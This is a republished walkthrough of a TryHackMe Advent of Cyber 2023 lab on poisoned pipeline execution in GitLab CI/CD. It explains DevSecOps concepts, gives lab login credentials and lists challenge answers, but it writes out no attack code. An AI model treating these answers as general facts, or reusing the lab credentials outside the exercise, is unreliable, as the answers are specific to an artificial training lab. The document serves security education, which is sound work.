Advent of Cyber 2023 — Day 20 Writeup with Answers by Karthikeyan Nagaraj | TryHackMe Walkthrough
2024-1-14 19:24:31 Author: infosecwriteups.com(查看原文) 阅读量:11 收藏

TryHackMe — DevSecOps Purple [ Advent of Frostlings ] — Someone is attacking the gift-giving pipeline by pushing malicious code and messing with the build process

Karthikeyan Nagaraj

InfoSec Write-ups

========================================
Click the Above Photo to View the Answers — — |
========================================

  1. Scenario
  2. Learning Objectives
  3. Understanding Concept
  4. Pre-Requisites
  5. Challenge Tasks — Answers
  6. Video Poc — https://youtu.be/8q7nFmxWDbM

One of the main reasons the Best Festival Company acquired AntarctiCrafts was their excellent automation for building, wrapping, and crafting. Their new automation pipelines make it a much easier, faster, scalable, and effective process. However, someone has tampered with the source control system, and something weird is happening! It’s suspected that McGreedy has impersonated some accounts or teamed up with rogue Frostlings. Who knows what will happen if a malicious user gains access to the pipeline?

  • ’Tis the season of giving, but the Frostlings have invaded the AntarctiCrafts GitLab CI/CD pipeline.
  • They have found a way to poison the pipeline, orchestrating the Advent Calendar build process for this holiday season.
  • Your mission as a DevSecOps engineer is to uncover and mitigate this attack to ensure the calendar doesn’t suffer from any malicious alterations.
  • Learn about poisoned pipeline execution.
  • Understand how to secure CI/CD pipelines.
  • Get an introduction to secure software development lifecycles (SSDLC) & DevSecOps.
  • Learn about CI/CD best practices.

GitLab and SDLC Concepts

GitLab is a platform that enables collaboration and automation throughout the software development lifecycle, which is the framework structure that describes the stages that code goes through, from design and development to deployment. GitLab is built around Git, a distributed version control system (VCS) where code is managed.

Here are the key components of GitLab:

  • Version control system: A VCS is the environment where you manage and track changes made in the codebase. It makes it easier to collaborate with others and maintain the history and versioning of a project.
  • CI/CD pipelines: Pipelines automate the building, testing, and deployment processes. Pipelines ensure the code is consistently integrated, tested, and delivered to the specified environment (production or staging).
  • Security scanning: GitLab has a few scanning features, like incorporating static application security testing (SAST), dynamic application security testing (DAST), container scanning, and dependency scanning. All these tools help identify and mitigate security threats in code and infrastructure.

CI/CD

We mentioned CI/CD earlier in the context of pipelines. CI/CD stands for continuous integration and continuous delivery.

  • Continuous integration: CI refers to integrating code changes from multiple contributors into a shared repository (where code is stored in a VCS; you can think of it as a folder structure). In GitLab, CI allows developers and engineers to commit code frequently, triggering automations that lead to builds and tests. This is what CI is all about: ensuring that code changes and updates are continuously validated, which reduces the likelihood of vulnerabilities when introducing security scans and tests as part of the validation process (here, we start entering the remit of DevSecOps).
  • Continuous deployment: CD automates code deployment to different environments. During SDLC, code travels to environments like sandbox and staging, where the tests and validations are performed before they go into the production environment. The production environment is where the final version of an app or service lives, which is what we, as users, tend to see. CD pipelines ensure the code is securely deployed consistently and as part of DevSecOps. Integrating security checks before deployment to production is key.

DevSecOps

We have mentioned that integrating security into CI/CD ensures consistency and threat reduction when integrating it into the SDLC. This is what DevSecOps aims to achieve. Everything we have seen so far is part of a cultural and technical approach that aims to improve collaboration, automation, and CI/CD. It’s what we call developer operations, or DevOps for short. DevSecOps was born from DevOps and is an extension specialising in security for DevOps practices.

CI/CD Attacks: PPE

In today’s AoC, you will learn about poisoned pipeline execution. This type of attack involves compromising a component or stage in the SDLC. For this attack to work, it takes advantage of the trust boundaries established within the supply chain, which is extremely common in CI/CD, where automation is everywhere.

When an attacker has access to version control systems and can manipulate the build process by injecting malicious code into the pipeline, they don’t need access to the build environment. This is where the “poisoned” pipelines come into play. It’s crucial to have effective, secure gates and guardrails to prevent malicious code from getting far if there is an account compromise.

Pre-Requisites

  1. Start the TryHackMe’s VPN or Start AttackBox
  2. Open the Machine URL in the new tab
  3. Log In with the credentials DelfSecOps:TryHackMe!
  4. If you receive an error after login, click the home button
  5. Then Click on the Advent Calendar BFC

1. What is the handle of the developer responsible for the merge changes?

Click on the Username Frostlino and you will see his handle

Ans: @badsecops

2. What port is the defaced calendar site server running on?

Click and Check the configuration file .gitlab-ci.yml

Ans: 9081

3. What server is the malicious server running on?

Ans: Apache

4. What message did the Frostlings leave on the defaced site?

Open your TryHackMe MachineIp with the port 9081 in new tab IP:9081

Ans: FROSTLINGS RULE 

5. What is the commit ID of the original code for the Advent Calendar site?

  1. Click on History, Scroll down to the bottom and you will see a commit made.
  2. Click on that and you will see the commit ID

======================================================
Ans: Use your Skills and try to find this answer,

If you are unable to do so,

use the video below to find the answer
=======================================================


文章来源: https://infosecwriteups.com/advent-of-cyber-2023-day-20-writeup-with-answers-by-karthikeyan-nagaraj-tryhackme-walkthrough-79eeb2b05659?source=rss----7b722bfd1b8d---4
如有侵权请联系:admin#unsafe.sh